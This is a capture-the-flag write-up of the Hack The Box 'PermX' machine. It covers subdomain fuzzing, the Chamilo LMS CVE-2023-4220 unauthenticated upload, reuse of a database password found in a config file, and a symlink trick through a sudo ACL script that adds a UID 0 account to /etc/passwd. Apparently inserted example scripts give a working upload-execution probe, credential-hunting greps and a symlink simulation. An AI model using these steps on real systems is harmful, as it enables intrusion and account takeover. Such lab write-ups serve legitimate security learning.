PermX Lab

Hack the Box Penetration Lab

Reconnaissance

First up, a port scan:

┌──(zero㉿zero)-[~]
└─$ rustscan 10.10.11.23 
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
Faster Nmap scanning with Rust.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
😵 https://admin.tryhackme.com

[~] The config file is expected to be at "/home/zero/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 10.10.11.23:22
Open 10.10.11.23:80
[~] Starting Nmap
[>] The Nmap command to be run is nmap -vvv -p 22,80 10.10.11.23

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-10 10:15 PDT
Initiating Ping Scan at 10:15
Scanning 10.10.11.23 [2 ports]
Completed Ping Scan at 10:15, 0.09s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 10:15
Completed Parallel DNS resolution of 1 host. at 10:15, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 10:15
Scanning 10.10.11.23 [2 ports]
Discovered open port 80/tcp on 10.10.11.23
Discovered open port 22/tcp on 10.10.11.23
Completed Connect Scan at 10:15, 0.24s elapsed (2 total ports)
Nmap scan report for 10.10.11.23
Host is up, received syn-ack (0.12s latency).
Scanned at 2024-08-10 10:15:17 PDT for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack
80/tcp open  http    syn-ack

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.35 seconds

Two ports are open: 22 (SSH) and 80 (HTTP). I also ran a service-detection nmap scan against the web port to see what hostname the server would give away.

It revealed a website, permx.htb. After adding that name to /etc/hosts I made my way to it.


It looks to be some sort of online learning platform. Time to poke around and see what I can find. Poking around the website didn't yield much, nor did a feroxbuster directory scan.

Time to try to find some subdomains.

This actually turned up something. The subdomain lms seemed interesting, and navigating to it led me here:
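The subdomain step above is shown only as a screenshot. The script below is an added example, not the author's command, and assumes the name was found by fuzzing the Host header against the box's IP (the target 10.10.11.23 and domain permx.htb are taken from the writeup; the wordlist path is a placeholder). It reports every candidate whose response size differs from the baseline returned for a name that cannot exist, which is the same filtering an ffuf or gobuster vhost scan does.

```shell
# Virtual-host discovery by fuzzing the Host header. Every wordlist entry is
# sent as "Host: <word>.<domain>" to the same IP; a response whose size differs
# from the baseline (a name that cannot exist) is a candidate vhost.
# CURL can be overridden so the logic can be exercised without a network.
: "${CURL:=curl}"

# fetch_size TARGET_URL HOSTNAME -> prints the response body size in bytes
fetch_size() {
    "$CURL" -s -o /dev/null -w '%{size_download}' -H "Host: $2" "$1" </dev/null
}

# vhost_fuzz TARGET_URL DOMAIN WORDLIST -> prints "<host> <size>" for each hit
vhost_fuzz() {
    target=$1; domain=$2; wordlist=$3
    # Baseline: what the server returns for an unknown Host (usually the
    # default site). Real vhosts are the names that answer differently.
    baseline=$(fetch_size "$target" "nonexistent-$$.$domain")
    while IFS= read -r word || [ -n "$word" ]; do
        [ -z "$word" ] && continue
        size=$(fetch_size "$target" "$word.$domain")
        if [ "$size" != "$baseline" ]; then
            printf '%s.%s %s\n' "$word" "$domain" "$size"
        fi
    done < "$wordlist"
    return 0
}

# Lab usage (wordlist path is a placeholder):
#   vhost_fuzz http://10.10.11.23 permx.htb subdomains.txt
```

Size is a crude discriminator: a site that serves dynamic content will vary between requests, in which case compare status codes or a stable substring instead. Any hit still needs a line in /etc/hosts before a browser will reach it.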


A login page, a pretty decent start. Now a quick Google search to see if there are any public exploits. It turns out the platform (Chamilo LMS) has a well-known unauthenticated file upload issue, CVE-2023-4220.

After researching the vulnerability and finding this article, it was pretty clear that I could get a shell uploaded and working with very little effort. The issue lies in bigUpload.php: its post-unsupported upload action saves whatever file is submitted into a web-served directory without checking the file's extension, so an unauthenticated attacker can upload a PHP web shell and then simply request it.

I created a small test file and tried out the exploit:

Success! The server executed the file I uploaded. Now for the real thing: uploading a reverse shell to gain access.
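The test-file step is only shown as a screenshot, so here is an added example (not the author's code) of the same check done safely: it uploads a PHP file that merely transforms a marker string, then requests it and checks whether the transformed marker comes back. That distinguishes real execution from a server that just serves the source. The endpoint, the action parameter and the bigUploadFile form field are those of the public CVE-2023-4220 proof of concept; the hostname lms.permx.htb is taken from the writeup.

```shell
# Probe for CVE-2023-4220 (Chamilo LMS): the "post-unsupported" action of
# bigUpload.php stores the submitted file in a web-served directory without
# checking its extension. The probe only echoes a transformed marker, so it
# proves execution without dropping a shell. CURL can be overridden so the
# flow can be exercised without a network.
: "${CURL:=curl}"
UPLOAD_PATH='/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'
FILES_PATH='/main/inc/lib/javascript/bigupload/files'

# upload_file BASE_URL LOCAL_FILE -> POSTs the file in the bigUploadFile field
upload_file() {
    "$CURL" -s -F "bigUploadFile=@$2" "$1$UPLOAD_PATH"
}

# fetch_uploaded BASE_URL NAME -> prints whatever the server serves for the upload
fetch_uploaded() {
    "$CURL" -s "$1$FILES_PATH/$2"
}

# check_rce BASE_URL -> prints "executed" (return 0) when PHP ran the probe,
# "not executed" (return 1) when the file was stored but served raw or not at all
check_rce() {
    base=$1
    marker="chk-$$-$(date +%s)"
    expect=$(printf '%s' "$marker" | tr -d '-')     # only PHP can produce this
    dir=$(mktemp -d)
    name="probe_$$.php"
    printf '<?php echo str_replace("-", "", "%s"); ?>\n' "$marker" > "$dir/$name"
    upload_file "$base" "$dir/$name" >/dev/null 2>&1
    body=$(fetch_uploaded "$base" "$name" 2>/dev/null)
    rm -rf "$dir"
    case "$body" in
        *"$expect"*) echo "executed"; return 0 ;;
        *) echo "not executed"; return 1 ;;
    esac
}

# Lab usage:
#   check_rce http://lms.permx.htb
```

The raw source of the probe contains the dashed marker but never the dash-free one, so a server that stores the file but does not run PHP in that directory is reported correctly as not exploitable. On a real engagement, remove the probe afterwards; it is world-reachable for anyone who guesses the name.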

Infiltration

The reverse shell I ended up using was from pentestmonkey. After gaining access to the system I upgraded to a stable shell to work from. There is also a non-root user on the system, mtz.

I was a little stuck, so I went digging and learned that it is often worth searching for the web application's configuration files: they typically hold database connection details and other information that can be reused to log in as other users. Learning a new way to search for specific files (find) was also handy for the future.

So, with the location of a config file, it's time to see what's inside.

Bingo: database connection details with a password attached. This might lead to the logins of specific users.

Using find once again, this time with a wildcard, to look for a database file turned up nothing. So I simply tried logging in as mtz with the password above. It worked.

Okay, easier than I thought it would be. But normally the simplest answer is the right one, right?
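The find commands from the two steps above are not reproduced on the page, so here is an added example (not the author's commands) of the same hunt done in one go: locate config-looking files under a directory, print only the lines that look like credentials, and list file-backed databases. The name patterns and the credential regex are my assumptions and a starting point, not an exhaustive list.

```shell
# Credential hunting on a compromised host: find configuration files by name
# and grep only the credential-looking lines instead of paging through whole
# files. Errors from unreadable paths are discarded.

# find_configs DIR -> paths of likely config files below DIR
find_configs() {
    find "$1" -type f \( -iname '*config*' -o -name '.env' -o -iname '*.ini' \
        -o -iname '*.yml' -o -iname '*.yaml' \) 2>/dev/null
}

# find_databases DIR -> paths that look like file-backed databases or dumps
find_databases() {
    find "$1" -type f \( -iname '*.db' -o -iname '*.sqlite' -o -iname '*.sqlite3' \
        -o -iname '*.sql' \) 2>/dev/null
}

# grep_creds DIR -> "file:line:text" for credential-looking lines in configs.
# The regex wants "pass"/"password"/"passwd" as a whole token (optionally
# prefixed by db_), or "secret" / "api_key" anywhere.
grep_creds() {
    find_configs "$1" | while IFS= read -r f; do
        grep -Hn -iE '(^|[^a-z])(db_?)?pass(word|wd)?([^a-z]|$)|secret|api[_-]?key' \
            "$f" 2>/dev/null || true
    done || true
}

# Typical use once a shell is obtained (paths are examples):
#   grep_creds /var/www
#   find_databases /
```

Run grep_creds against the web root first and widen to / only if it comes up empty; on a real system the wide search is noisy and slow. Whatever password falls out, try it against every local account and the SSH service, since reuse between the application database and a user account is exactly what worked here.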

Anyway, after logging in I cd'd back to mtz's home directory and found the user flag, along with some other odd files:

Now it's time to try for root. There at least seems to be a clue in password.txt, but a lot of that turned out to be junk. Next I checked which files I can run with sudo. It turns out there is a single file on the system I can run that way.

The file acl.sh, however, is not writable, so I cannot simply edit it.

This is where I get stuck most of the time. Getting root access has been a bit of a struggle for me; being new to this, I needed a little push in the right direction. I did some research and found that a symlink might be the way to proceed.

Also a small note: whenever I logged back into the machine the next day, for some unknown reason (to me at least) this is missing:

I am still able to type and execute commands, I just have no clue why it vanishes; it seems very inconsistent.

Back to gaining root access. After reading up on symlinks, I was able to link my own temporary file to the main passwd file, gain root access, and find the flag.

The first line creates a symlink named passwd in my home directory that points at /etc/passwd. The second line runs the only file I have sudo privileges for, which happens to change file permissions (ACLs, going by the name); because the permission change follows the link, the write access lands on /etc/passwd itself. The third line appends a root-level (UID 0) account called root3 to that file. After that I just hunted for the root flag.
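The three commands above are shown only as a screenshot, and the page does not show what acl.sh checks. The script below is an added example, not the box's script or the author's commands, that reproduces the mechanism as a simulation any unprivileged user can run: weak_acl is a hypothetical helper that accepts only targets under an allowed directory (string prefix, no "..") and then changes permissions on the path it was given; chmod stands in for the real helper's ACL change because ACL tools may not be installed. The prefix check passes for a link inside the directory, but the permission change follows the link to a file outside it. safe_acl makes the same decision on the resolved path.

```shell
# weak_acl ALLOWED_DIR TARGET -> grants world-write on TARGET after checking
# only the string form of the path (hypothetical helper, modelled on the
# symlink trick used for root on this box)
weak_acl() {
    allowed=$1; target=$2
    case "$target" in
        "$allowed"/*) ;;                          # must be under the allowed dir
        *) echo "Access denied."; return 1 ;;
    esac
    case "$target" in *..*) echo "Access denied."; return 1 ;; esac
    [ -f "$target" ] || { echo "Target must be a file."; return 1; }
    chmod o+w "$target"                            # follows symlinks
}

# safe_acl ALLOWED_DIR TARGET -> same grant, but refuses symlink arguments and
# compares the canonical path of the target against the canonical allowed dir,
# so links in any path component are resolved before the decision
safe_acl() {
    allowed=$(readlink -f "$1"); target=$2
    [ -L "$target" ] && { echo "Symlinks are not allowed."; return 1; }
    real=$(readlink -f "$target") || { echo "Bad path."; return 1; }
    case "$real" in
        "$allowed"/*) ;;
        *) echo "Access denied."; return 1 ;;
    esac
    [ -f "$real" ] || { echo "Target must be a file."; return 1; }
    chmod o+w "$real"
}

# other_write FILE -> "w" if FILE is world-writable, "-" otherwise
other_write() {
    ls -l "$1" | cut -c9
}

# symlink_demo HELPER -> builds a throwaway tree (a stand-in /etc/passwd outside
# the allowed "home", and a link to it inside), runs HELPER against the link,
# and prints whether the protected file became world-writable
symlink_demo() {
    helper=$1
    work=$(mktemp -d)
    mkdir "$work/home" "$work/etc"
    printf 'root:x:0:0:root:/root:/bin/bash\n' > "$work/etc/passwd"   # constructed
    chmod 644 "$work/etc/passwd"
    ln -s "$work/etc/passwd" "$work/home/passwd"                     # attacker's link
    "$helper" "$work/home" "$work/home/passwd" >/dev/null 2>&1 || true
    if [ "$(other_write "$work/etc/passwd")" = "w" ]; then
        echo "world-writable"
    else
        echo "unchanged"
    fi
    rm -rf "$work"
}

# symlink_demo weak_acl   -> world-writable (the link is followed)
# symlink_demo safe_acl   -> unchanged
```

On the box, the three real lines were the ln -s into mtz's home, the sudo run of acl.sh against that link, and the append of the root3 line; once /etc/passwd is writable by mtz, adding a UID 0 entry is the whole privilege escalation. Two caveats for anyone writing such a helper: safe_acl still has a race between its symlink check and the chmod, so a privileged helper should hand the operation to a tool that refuses to follow links itself (setfacl has -P for exactly this), and it should never accept a path inside a directory the caller controls.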

Conclusion

This box taught me a fair bit. I learned about symlinks, find queries, and where to look for stored passwords in application config files. I wish I had used linPEAS from the start, but now I know!
